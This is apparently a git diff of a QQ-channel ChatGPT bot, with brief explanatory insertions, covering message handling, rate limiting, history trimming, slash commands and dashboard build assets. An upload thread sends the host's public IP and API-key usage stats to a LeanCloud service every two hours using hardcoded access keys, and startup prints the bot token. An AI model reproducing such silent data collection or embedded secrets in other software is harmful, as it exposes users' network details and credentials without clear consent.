addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
d = {"data": {"guild_count": guild_count, "guild_msg_count": guild_msg_count, "guild_direct_msg_count": guild_direct_msg_count, "session_count": session_count, 'addr': addr, 'winver': '2.21', 'key_stat':key_stat}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
print("[System] New User.")
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open(abs_path+"configs/object_id", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
except BaseException as e:
|
||||
pass
|
||||
# 每隔2小时上传一次
|
||||
time.sleep(60*60*2)
|
||||
|
||||
'''
|
||||
初始化机器人
|
||||
'''
|
||||
def initBot(chatgpt_inst):
|
||||
global chatgpt
|
||||
chatgpt = chatgpt_inst
|
||||
global max_tokens
|
||||
max_tokens = int(chatgpt_inst.getConfigs()['total_tokens_limit'])
|
||||
global now_personality
|
||||
|
||||
|
||||
# 读取历史记录 Soulter
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
session_dict[session[0]] = json.loads(session[1])['data']
|
||||
print("[System] 历史记录读取成功喵")
|
||||
except BaseException as e:
|
||||
print("[System] 历史记录读取失败: " + str(e))
|
||||
|
||||
# 读统计信息
|
||||
global stat_file
|
||||
if not os.path.exists(abs_path+"configs/stat"):
|
||||
with open(abs_path+"configs/stat", 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
stat_file = open(abs_path+"configs/stat", 'r', encoding='utf-8')
|
||||
global count
|
||||
res = stat_file.read()
|
||||
if res == '':
|
||||
count = {}
|
||||
else:
|
||||
try:
|
||||
count = json.loads(res)
|
||||
except BaseException:
|
||||
pass
|
||||
# 创建转储定时器线程
|
||||
threading.Thread(target=dump_history, daemon=True).start()
|
||||
|
||||
if is_upload_log:
|
||||
# 读取object_id
|
||||
global object_id
|
||||
if not os.path.exists(abs_path+"configs/object_id"):
|
||||
with open(abs_path+"configs/object_id", 'w', encoding='utf-8') as f:
|
||||
f.write("")
|
||||
object_id_file = open(abs_path+"configs/object_id", 'r', encoding='utf-8')
|
||||
object_id = object_id_file.read()
|
||||
object_id_file.close()
|
||||
# 创建上传定时器线程
|
||||
threading.Thread(target=upload, daemon=True).start()
|
||||
|
||||
global config, uniqueSession, history_dump_interval, frequency_count, frequency_time,announcement
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
config = cfg
|
||||
|
||||
# 得到发言频率配置
|
||||
if 'limit' in cfg:
|
||||
print('[System] 发言频率配置: '+str(cfg['limit']))
|
||||
if 'count' in cfg['limit']:
|
||||
frequency_count = cfg['limit']['count']
|
||||
if 'time' in cfg['limit']:
|
||||
frequency_time = cfg['limit']['time']
|
||||
|
||||
announcement += '[QQChannelChatGPT项目]\n所有回答与腾讯公司无关。出现问题请前往[ChatGPT机器人]官方频道\n\n'
|
||||
# 得到公告配置
|
||||
if 'notice' in cfg:
|
||||
print('[System] 公告配置: '+cfg['notice'])
|
||||
announcement += cfg['notice']
|
||||
try:
|
||||
if 'uniqueSessionMode' in cfg and cfg['uniqueSessionMode']:
|
||||
uniqueSession = True
|
||||
else:
|
||||
uniqueSession = False
|
||||
print("[System] 独立会话: " + str(uniqueSession))
|
||||
if 'dump_history_interval' in cfg:
|
||||
history_dump_interval = int(cfg['dump_history_interval'])
|
||||
print("[System] 历史记录转储时间周期: " + str(history_dump_interval) + "分钟")
|
||||
except BaseException:
|
||||
print("[System-Error] 读取uniqueSessionMode/version/dump_history_interval配置文件失败, 使用默认值。")
|
||||
|
||||
print(f"[System] QQ开放平台AppID: {cfg['qqbot']['appid']} 令牌: {cfg['qqbot']['token']}")
|
||||
|
||||
print("[System] 如果有任何问题,请在https://github.com/Soulter/QQChannelChatGPT上提交issue说明问题!或者添加QQ:905617992\n")
|
||||
try:
|
||||
run_bot(cfg['qqbot']['appid'], cfg['qqbot']['token'])
|
||||
except BaseException as e:
|
||||
input(f"\n[System-Error] 启动QQ机器人时出现错误,原因如下:{e}\n可能是没有填写QQBOT appid和token?请在config中完善你的appid和token\n配置教程:https://soulter.top/posts/qpdg.html\n")
|
||||
|
||||
'''
|
||||
启动机器人
|
||||
'''
|
||||
def run_bot(appid, token):
|
||||
intents = botpy.Intents(public_guild_messages=True, direct_message=True)
|
||||
global client
|
||||
client = botClient(intents=intents)
|
||||
client.run(appid=appid, token=token)
|
||||
|
||||
'''
|
||||
得到OpenAI的回复
|
||||
'''
|
||||
def get_chatGPT_response(prompts_str, image_mode=False):
|
||||
res = ''
|
||||
usage = ''
|
||||
if not image_mode:
|
||||
res, usage = chatgpt.chat(prompts_str)
|
||||
# 处理结果文本
|
||||
chatgpt_res = res.strip()
|
||||
return res, usage
|
||||
else:
|
||||
res = chatgpt.chat(prompts_str, image_mode = True)
|
||||
return res
|
||||
|
||||
'''
|
||||
回复QQ消息
|
||||
'''
|
||||
def send_qq_msg(message, res, image_mode=False):
|
||||
if not image_mode:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(content=res), client.loop)
|
||||
except BaseException as e:
|
||||
raise e
|
||||
else:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(image=res, content=""), client.loop)
|
||||
|
||||
|
||||
'''
|
||||
获取缓存的会话
|
||||
'''
|
||||
def get_prompts_by_cache_list(cache_data_list, divide=False, paging=False, size=5, page=1):
|
||||
prompts = ""
|
||||
if paging:
|
||||
page_begin = (page-1)*size
|
||||
page_end = page*size
|
||||
if page_begin < 0:
|
||||
page_begin = 0
|
||||
if page_end > len(cache_data_list):
|
||||
page_end = len(cache_data_list)
|
||||
cache_data_list = cache_data_list[page_begin:page_end]
|
||||
for item in cache_data_list:
|
||||
prompts += str(item['prompt'])
|
||||
if divide:
|
||||
prompts += "----------\n"
|
||||
return prompts
|
||||
|
||||
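`get_prompts_by_cache_list` concatenates the cached `prompt` fields, optionally slicing the cache into pages of `size` items first. A condensed, runnable copy of the helper with dummy cache entries, just to show what the paging arguments do:

```python
def get_prompts_by_cache_list(cache_data_list, divide=False, paging=False, size=5, page=1):
    # Condensed copy of the helper above so the example runs standalone.
    prompts = ""
    if paging:
        page_begin = max((page - 1) * size, 0)
        page_end = min(page * size, len(cache_data_list))
        cache_data_list = cache_data_list[page_begin:page_end]
    for item in cache_data_list:
        prompts += str(item["prompt"])
        if divide:
            prompts += "----------\n"
    return prompts

cache = [{"prompt": f"Human: q{i}\nAI: a{i}\n", "single_tokens": 10} for i in range(7)]
print(get_prompts_by_cache_list(cache, divide=True, paging=True, size=3, page=2))
# prints turns q3..q5, each followed by a ---------- divider
```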
def get_user_usage_tokens(cache_list):
|
||||
usage_tokens = 0
|
||||
for item in cache_list:
|
||||
usage_tokens += int(item['single_tokens'])
|
||||
return usage_tokens
|
||||
|
||||
'''
|
||||
检查发言频率
|
||||
'''
|
||||
def check_frequency(id) -> bool:
|
||||
ts = int(time.time())
|
||||
if id in user_frequency:
|
||||
if ts-user_frequency[id]['time'] > frequency_time:
|
||||
user_frequency[id]['time'] = ts
|
||||
user_frequency[id]['count'] = 1
|
||||
return True
|
||||
else:
|
||||
if user_frequency[id]['count'] >= frequency_count:
|
||||
return False
|
||||
else:
|
||||
user_frequency[id]['count']+=1
|
||||
return True
|
||||
else:
|
||||
t = {'time':ts,'count':1}
|
||||
user_frequency[id] = t
|
||||
return True
|
||||
|
||||
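`check_frequency` is a per-user fixed-window limiter: the first message opens a window of `frequency_time` seconds, at most `frequency_count` messages are accepted inside it, and the counter only resets once a message arrives after the window has expired. A compact standalone version demonstrating that behaviour (the optional `now` parameter exists only to make the example deterministic):

```python
import time

frequency_time = 60   # window length in seconds
frequency_count = 2   # allowed messages per window
user_frequency = {}

def check_frequency(user_id, now=None) -> bool:
    ts = int(now if now is not None else time.time())
    entry = user_frequency.get(user_id)
    if entry is None or ts - entry["time"] > frequency_time:
        user_frequency[user_id] = {"time": ts, "count": 1}  # start a new window
        return True
    if entry["count"] >= frequency_count:
        return False                                        # over the limit, reject
    entry["count"] += 1
    return True

print(check_frequency("u1", now=0))    # True  (1st message)
print(check_frequency("u1", now=10))   # True  (2nd message)
print(check_frequency("u1", now=20))   # False (limit hit inside the window)
print(check_frequency("u1", now=100))  # True  (window expired, counter reset)
```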
'''
|
||||
处理消息
|
||||
'''
|
||||
def oper_msg(message, at=False, loop=None):
|
||||
global session_dict
|
||||
print("[QQBOT] 接收到消息:"+ str(message.content))
|
||||
qq_msg = ''
|
||||
session_id = ''
|
||||
name = ''
|
||||
user_id = message.author.id
|
||||
user_name = message.author.username
|
||||
|
||||
# 检查发言频率
|
||||
if not check_frequency(user_id):
|
||||
send_qq_msg(message, f'{user_name}的发言超过频率限制(╯▔皿▔)╯。\n{frequency_time}秒内只能提问{frequency_count}次。')
|
||||
return
|
||||
|
||||
logf.write("[QQBOT] "+ str(message.content)+'\n')
|
||||
logf.flush()
|
||||
|
||||
if at:
|
||||
qq_msg = message.content
|
||||
lines = qq_msg.splitlines()
|
||||
for i in range(len(lines)):
|
||||
lines[i] = re.sub(r"<@!\d+>", "", lines[i])
|
||||
qq_msg = "\n".join(lines).lstrip().strip()
|
||||
|
||||
if uniqueSession:
|
||||
session_id = user_id
|
||||
else:
|
||||
session_id = message.channel_id
|
||||
else:
|
||||
qq_msg = message.content
|
||||
session_id = user_id
|
||||
|
||||
if uniqueSession:
|
||||
name = user_name
|
||||
else:
|
||||
name = "频道"
|
||||
|
||||
command_type = -1
|
||||
# 特殊指令
|
||||
if qq_msg == "/继续":
|
||||
qq_msg = "继续"
|
||||
# 普通指令
|
||||
else:
|
||||
# 如果第一个字符是/,则为指令
|
||||
if qq_msg[0] == "/":
|
||||
res, go, command_type = command_oper(qq_msg, message, session_id, name, user_id, user_name, at)
|
||||
send_qq_msg(message, res)
|
||||
if not go:
|
||||
return
|
||||
if command_type == 1 and 'prompt' in now_personality:
|
||||
# 设置人格
|
||||
qq_msg = now_personality['prompt']
|
||||
|
||||
# if qq_msg[0:6] == '/draw ':
|
||||
# # TODO 未完全实现
|
||||
# prompt = qq_msg[6:]
|
||||
# url = get_chatGPT_response(prompt, image_mode = True)
|
||||
# resp = requests.get(url)
|
||||
# filename = './images/' + str(int(time.time())) + '.jpg'
|
||||
# print(url)
|
||||
# with open(filename, 'wb') as f:
|
||||
# f.write(resp.content)
|
||||
# qiniu_url = cores.database.qiniu.put_img(filename)
|
||||
# print(qiniu_url)
|
||||
# send_qq_msg(message, qiniu_url, image_mode=True)
|
||||
# return
|
||||
|
||||
# 这里是预设,你可以按需更改
|
||||
if qq_msg.strip() == 'hello' or qq_msg.strip() == '你好' or qq_msg.strip() == '':
|
||||
send_qq_msg(message, f"你好呀~")
|
||||
return
|
||||
# if qq_msg.strip() == '傻逼' or qq_msg.strip() == 'sb':
|
||||
# send_qq_msg(message, f"好好好")
|
||||
# return
|
||||
# if '喜多' in qq_msg:
|
||||
# send_qq_msg(message, 'http://rn2ztkeap.hn-bkt.clouddn.com/xd1.gif', True)
|
||||
# if '台湾' in qq_msg or 'taiwan' in qq_msg:
|
||||
# send_qq_msg(message, "声明:台湾是中国的一部分。\n下面否定此结论的回答全部无效。")
|
||||
|
||||
# 拦截不合适的词请求
|
||||
for i in uw.unfit_words_q:
|
||||
if i in qq_msg.strip():
|
||||
send_qq_msg(message, f"你的提问中有不太合适的内容😭\n请更换措辞~")
|
||||
return
|
||||
|
||||
if session_id not in session_dict:
|
||||
session_dict[session_id] = []
|
||||
|
||||
fjson = {}
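# configs/session only records which session ids have ever appeared ('true' flags);
# get_stat() below counts these entries as the historical session count.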
|
||||
try:
|
||||
f = open(abs_path+"configs/session", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
fjson[session_id] = 'true'
|
||||
f = open(abs_path+"configs/session", "w", encoding="utf-8")
|
||||
f.write(json.dumps(fjson))
|
||||
f.flush()
|
||||
f.close()
|
||||
|
||||
# 获取缓存
|
||||
cache_prompt = ''
|
||||
cache_data_list = session_dict[session_id]
|
||||
cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
cache_prompt += "\nHuman: "+ qq_msg + "\nAI: "
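# The cached history plus the new question is sent as one completion-style prompt of the form
# "Human: ...\nAI: ...".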
|
||||
# 请求chatGPT获得结果
|
||||
try:
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
except (PromptExceededError) as e:
|
||||
print("token超限, 清空对应缓存")
|
||||
session_dict[session_id] = []
|
||||
cache_data_list = []
|
||||
cache_prompt = "Human: "+ qq_msg + "\nAI: "
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
except (BaseException) as e:
|
||||
print("OpenAI API错误:(")
|
||||
if 'exceeded' in str(e):
|
||||
send_qq_msg(message, f"OpenAI API错误。原因:\n{str(e)} \n超额了。您可自己搭建一个机器人(Github仓库:QQChannelChatGPT)")
|
||||
else:
|
||||
send_qq_msg(message, f"OpenAI API错误。原因如下:\n{str(e)} \n前往官方频道反馈~")
|
||||
return
|
||||
|
||||
logf.write("[GPT] "+ str(chatgpt_res)+'\n')
|
||||
logf.flush()
|
||||
|
||||
# 发送qq信息
|
||||
try:
|
||||
# 防止被qq频道过滤消息
|
||||
gap_chatgpt_res = chatgpt_res.replace(".", " . ")
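# Padding "." with spaces breaks up URL-like text, which appears to make the QQ channel
# content filter less likely to drop the reply (assumption based on the comment above).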
|
||||
if '```' in gap_chatgpt_res:
|
||||
gap_chatgpt_res = gap_chatgpt_res.replace('```', "")
|
||||
# 过滤不合适的词
|
||||
for i in uw.unfit_words:
|
||||
if i in gap_chatgpt_res:
|
||||
gap_chatgpt_res = gap_chatgpt_res.replace(i, "***")
|
||||
# 发送信息
|
||||
send_qq_msg(message, ''+gap_chatgpt_res)
|
||||
except BaseException as e:
|
||||
print("QQ频道API错误: \n"+str(e))
|
||||
f_res = ""
|
||||
for t in chatgpt_res:
|
||||
f_res += t + ' '
|
||||
try:
|
||||
send_qq_msg(message, ''+f_res)
|
||||
# send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")
|
||||
except BaseException as e:
|
||||
# 如果还是不行则过滤url
|
||||
f_res = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '', f_res, flags=re.MULTILINE)
|
||||
f_res = f_res.replace(".", "·")
|
||||
send_qq_msg(message, ''+f_res)
|
||||
# send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")
|
||||
|
||||
# 超过指定tokens, 尽可能的保留最多的条目,直到小于max_tokens
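# Trimming policy: drop the oldest entries first, but keep entries whose level is 'max'
# (persona prompts set via /set), until the total is back under max_tokens.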
|
||||
if current_usage_tokens > max_tokens:
|
||||
t = current_usage_tokens
|
||||
index = 0
|
||||
while t > max_tokens:
|
||||
if index >= len(cache_data_list):
|
||||
break
|
||||
if cache_data_list[index]['level'] != 'max':
|
||||
t -= int(cache_data_list[index]['single_tokens'])
|
||||
del cache_data_list[index]
|
||||
else:
|
||||
index += 1
|
||||
# 删除完后更新相关字段
|
||||
session_dict[session_id] = cache_data_list
|
||||
cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
|
||||
# 添加新条目进入缓存的prompt
|
||||
if command_type == 1:
|
||||
level = 'max'
|
||||
else:
|
||||
level = 'normal'
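# single_tokens stores only this round's consumption: the new running total minus the
# running total recorded on the previous cache entry.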
|
||||
if len(cache_data_list) > 0:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens - int(cache_data_list[-1]['usage_tokens']),
|
||||
"level": level
|
||||
}
|
||||
else:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens,
|
||||
"level": level
|
||||
}
|
||||
cache_data_list.append(single_record)
|
||||
session_dict[session_id] = cache_data_list
|
||||
|
||||
'''
|
||||
获取统计信息
|
||||
'''
|
||||
def get_stat():
    try:
        f = open(abs_path+"configs/stat", "r", encoding="utf-8")
        fjson = json.loads(f.read())
        f.close()
        guild_count = 0
        guild_msg_count = 0
        guild_direct_msg_count = 0

        for k, v in fjson.items():
            guild_count += 1
            guild_msg_count += v['count']
            guild_direct_msg_count += v['direct_count']

        session_count = 0

        f = open(abs_path+"configs/session", "r", encoding="utf-8")
        fjson = json.loads(f.read())
        f.close()
        for k, v in fjson.items():
            session_count += 1
        return guild_count, guild_msg_count, guild_direct_msg_count, session_count
    except:
        return -1, -1, -1, -1
|
||||
|
||||
'''
|
||||
指令处理
|
||||
'''
|
||||
def command_oper(qq_msg, message, session_id, name, user_id, user_name, at):
|
||||
go = False # 是否处理完指令后继续执行msg_oper后面的代码
|
||||
msg = ''
|
||||
global session_dict, now_personality
|
||||
|
||||
# 指令返回值,/set设置人格是1
|
||||
type = -1
|
||||
|
||||
# 指令控制
|
||||
if qq_msg == "/reset" or qq_msg == "/重置":
|
||||
msg = ''
|
||||
session_dict[session_id] = []
|
||||
if at:
|
||||
msg = f"{name}(id: {session_id})的历史记录重置成功\n\n{announcement}"
|
||||
else:
|
||||
msg = f"你的历史记录重置成功"
|
||||
|
||||
if qq_msg[:4] == "/his":
|
||||
#分页,每页5条
|
||||
msg = ''
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
if qq_msg[5:]:
|
||||
page = int(qq_msg[5:])
|
||||
# 检查是否有过历史记录
|
||||
if session_id not in session_dict:
    msg = f"{name} 的历史记录为空"
    return msg, go, type
|
||||
l = session_dict[session_id]
|
||||
max_page = len(l)//size_per_page + 1 if len(l)%size_per_page != 0 else len(l)//size_per_page
|
||||
p = get_prompts_by_cache_list(session_dict[session_id], divide=True, paging=True, size=size_per_page, page=page)
|
||||
if at:
|
||||
msg=f"{name}的历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页"
|
||||
else:
|
||||
msg=f"历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页\n\n{announcement}"
|
||||
|
||||
if qq_msg == "/token":
|
||||
msg = ''
|
||||
if at:
|
||||
msg=f"{name} 会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
else:
|
||||
msg=f"会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
|
||||
if qq_msg == "/status" or qq_msg == "/状态":
|
||||
chatgpt_cfg_str = ""
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
key_list = chatgpt.get_key_list()
|
||||
index = 1
|
||||
max = 900000
|
||||
gg_count = 0
|
||||
total = 0
|
||||
tag = ''
|
||||
for key in key_stat.keys():
|
||||
sponsor = ''
|
||||
total += key_stat[key]['used']
|
||||
if key_stat[key]['exceed']:
|
||||
gg_count += 1
|
||||
continue
|
||||
if 'sponsor' in key_stat[key]:
|
||||
sponsor = key_stat[key]['sponsor']
|
||||
chatgpt_cfg_str += f" |-{index}: {key_stat[key]['used']}/{max} {sponsor}赞助{tag}\n"
|
||||
index += 1
|
||||
msg = f"⭐使用情况({str(gg_count)}个已用):\n{chatgpt_cfg_str}⏰全频道已用{total}tokens\n{announcement}"
|
||||
if qq_msg == "/count" or qq_msg == "/统计":
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
msg = f"当前会话数: {len(session_dict)}\n共有频道数: {guild_count} \n共有消息数: {guild_msg_count}\n私信数: {guild_direct_msg_count}\n历史会话数: {session_count}"
|
||||
|
||||
if qq_msg == "/help":
|
||||
msg = "[Github项目名: QQChannelChatGPT,有问题请前往提交issue,欢迎赞助支持我!]\n\n指令面板:\n/status 查看机器人key状态\n/count 查看机器人统计信息\n/reset 重置会话\n/his 查看历史记录\n/token 查看会话token数\n/help 查看帮助\n/key 人格指令菜单"
|
||||
|
||||
if qq_msg[:4] == "/key":
|
||||
if len(qq_msg) == 4:
|
||||
msg = "感谢您赞助key。请以以下格式赞助:\n/key xxxxx"
|
||||
key = qq_msg[5:]
|
||||
send_qq_msg(message, "收到!正在核验...")
|
||||
if chatgpt.check_key(key):
|
||||
msg = f"*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。\n该Key被验证为有效。感谢{user_name}赞助~"
|
||||
chatgpt.append_key(key, user_name)
|
||||
else:
|
||||
msg = "该Key被验证为无效。也许是输入错误了,或者重试。"
|
||||
|
||||
if qq_msg[:6] == "/unset":
|
||||
now_personality = {}
|
||||
msg = "已清除人格"
|
||||
|
||||
if qq_msg[:4] == "/set":
|
||||
if len(qq_msg) == 4:
|
||||
np = '无'
|
||||
if "name" in now_personality:
|
||||
np=now_personality["name"]
|
||||
msg = f"【由Github项目QQChannelChatGPT支持】\n\n【人格文本由PlexPt开源项目awesome-chatgpt-prompts-zh提供】\n\n这个是人格设置指令。\n设置人格: \n/set 人格名。例如/set 编剧\n人格列表: /set list\n人格详细信息: /set view 人格名\n自定义人格: /set 人格文本\n清除人格: /unset\n【当前人格】: {np}"
|
||||
elif qq_msg[5:] == "list":
|
||||
per_dict = personalities
|
||||
msg = "人格列表:\n"
|
||||
for key in per_dict.keys():
|
||||
msg += f" |-{key}\n"
|
||||
msg += '\n\n*输入/set view 人格名查看人格详细信息'
|
||||
msg += '\n\n*不定时更新人格库,请及时更新本项目。'
|
||||
elif qq_msg[5:9] == "view":
|
||||
ps = qq_msg[10:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{per_dict[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
else:
|
||||
ps = qq_msg[5:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
now_personality = {
|
||||
'name': ps,
|
||||
'prompt': per_dict[ps]
|
||||
}
|
||||
session_dict[session_id] = []
|
||||
msg = f"人格{ps}已设置,请耐心等待机器人回复第一条信息。"
|
||||
go = True
|
||||
type = 1
|
||||
else:
|
||||
msg = f"人格{ps}不存在, 请使用/set list查看人格列表"
|
||||
return msg, go, type
|
||||
10
dashboard/__init__.py
Normal file
@@ -0,0 +1,10 @@
|
||||
from dataclasses import dataclass


class DashBoardData():
    stats: dict = {}


@dataclass
class Response():
    status: str
    message: str
    data: dict
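# Response is a plain dataclass; helper.py imports dataclasses.asdict, presumably to turn it
# into a JSON-serializable dict, e.g. asdict(Response(status="ok", message="", data={})).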
|
||||
1
dashboard/dist/_redirects
vendored
Normal file
@@ -0,0 +1 @@
|
||||
/* /index.html 200
|
||||
1
dashboard/dist/assets/BaseBreadcrumb-4d676ba5.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.page-breadcrumb .v-toolbar{background:transparent}
|
||||
1
dashboard/dist/assets/BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as i,o as l,c as _,w as s,a as e,f as a,J as m,V as c,b as t,t as u,ae as p,B as n,af as o,j as f}from"./index-25639696.js";const b={class:"text-h3"},h={class:"d-flex align-center"},g={class:"d-flex align-center"},V=i({__name:"BaseBreadcrumb",props:{title:String,breadcrumbs:Array,icon:String},setup(d){const r=d;return(x,B)=>(l(),_(c,{class:"page-breadcrumb mb-1 mt-1"},{default:s(()=>[e(a,{cols:"12",md:"12"},{default:s(()=>[e(m,{variant:"outlined",elevation:"0",class:"px-4 py-3 withbg"},{default:s(()=>[e(c,{"no-gutters":"",class:"align-center"},{default:s(()=>[e(a,{md:"5"},{default:s(()=>[t("h3",b,u(r.title),1)]),_:1}),e(a,{md:"7",sm:"12",cols:"12"},{default:s(()=>[e(p,{items:r.breadcrumbs,class:"text-h5 justify-md-end pa-1"},{divider:s(()=>[t("div",h,[e(n(o),{size:"17"})])]),prepend:s(()=>[e(f,{size:"small",icon:"mdi-home",class:"text-secondary mr-2"}),t("div",g,[e(n(o),{size:"17"})])]),_:1},8,["items"])]),_:1})]),_:1})]),_:1})]),_:1})]),_:1}))}});export{V as _};
|
||||
1
dashboard/dist/assets/BlankLayout-503500e2.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as e,o as a,c as t,w as o,a as s,B as n,Z as r,W as c}from"./index-25639696.js";const f=e({__name:"BlankLayout",setup(p){return(u,_)=>(a(),t(c,null,{default:o(()=>[s(n(r))]),_:1}))}});export{f as default};
|
||||
1
dashboard/dist/assets/ColorPage-55364acc.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as p,D as a,o as r,s,a as e,w as t,f as o,V as i,F as n,u as g,c as h,a0 as b,e as x,t as y}from"./index-25639696.js";const P=p({__name:"ColorPage",setup(C){const c=a({title:"Colors Page"}),d=a([{title:"Utilities",disabled:!1,href:"#"},{title:"Colors",disabled:!0,href:"#"}]),u=a(["primary","lightprimary","secondary","lightsecondary","info","success","accent","warning","error","darkText","lightText","borderLight","inputBorder","containerBg"]);return(V,k)=>(r(),s(n,null,[e(m,{title:c.value.title,breadcrumbs:d.value},null,8,["title","breadcrumbs"]),e(i,null,{default:t(()=>[e(o,{cols:"12",md:"12"},{default:t(()=>[e(_,{title:"Color Palette"},{default:t(()=>[e(i,null,{default:t(()=>[(r(!0),s(n,null,g(u.value,(l,f)=>(r(),h(o,{md:"3",cols:"12",key:f},{default:t(()=>[e(b,{rounded:"md",class:"align-center justify-center d-flex",height:"100",width:"100%",color:l},{default:t(()=>[x("class: "+y(l),1)]),_:2},1032,["color"])]),_:2},1024))),128))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{P as default};
|
||||
1
dashboard/dist/assets/ConfigDetailCard-0eb16275.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{o as l,s as o,u as c,c as n,w as u,Q as g,b as d,R as k,F as t,ac as h,O as p,t as m,a as V,ad as f,i as C,q as x,k as v,A as U}from"./index-25639696.js";import{_ as w}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";const S={__name:"ConfigDetailCard",props:{config:Array},setup(s){return(y,B)=>(l(!0),o(t,null,c(s.config,r=>(l(),n(w,{key:r.name,title:r.name,style:{"margin-bottom":"16px"}},{default:u(()=>[g(d("a",null,"No data",512),[[k,s.config.length===0]]),(l(!0),o(t,null,c(r.body,e=>(l(),o(t,null,[e.config_type==="item"?(l(),o(t,{key:0},[e.val_type==="bool"?(l(),n(h,{key:0,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,color:"primary",inset:""},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="str"?(l(),n(p,{key:1,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="int"?(l(),n(p,{key:2,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="list"?(l(),o(t,{key:3},[d("span",null,m(e.name),1),V(f,{modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,chips:"",clearable:"",label:"请添加",multiple:"","prepend-icon":"mdi-tag-multiple-outline"},{selection:u(({attrs:a,item:i,select:b,selected:_})=>[V(C,x(a,{"model-value":_,closable:"",onClick:b,"onClick:close":D=>y.remove(i)}),{default:u(()=>[d("strong",null,m(i),1)]),_:2},1040,["model-value","onClick","onClick:close"])]),_:2},1032,["modelValue","onUpdate:modelValue"])],64)):v("",!0)],64)):e.config_type==="divider"?(l(),n(U,{key:1,style:{"margin-top":"8px","margin-bottom":"8px"}})):v("",!0)],64))),256))]),_:2},1032,["title"]))),128))}};export{S as _};
|
||||
1
dashboard/dist/assets/ConfigPage-8225b5ca.js
vendored
Normal file
1
dashboard/dist/assets/ConfigPage-f564cc69.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.v-tab{text-transform:none!important}
|
||||
11
dashboard/dist/assets/ConsolePage-e3d6951b.js
vendored
Normal file
32
dashboard/dist/assets/ConsolePage-ff373be6.css
vendored
Normal file
@@ -0,0 +1,32 @@
|
||||
/**
|
||||
* Copyright (c) 2014 The xterm.js authors. All rights reserved.
|
||||
* Copyright (c) 2012-2013, Christopher Jeffrey (MIT License)
|
||||
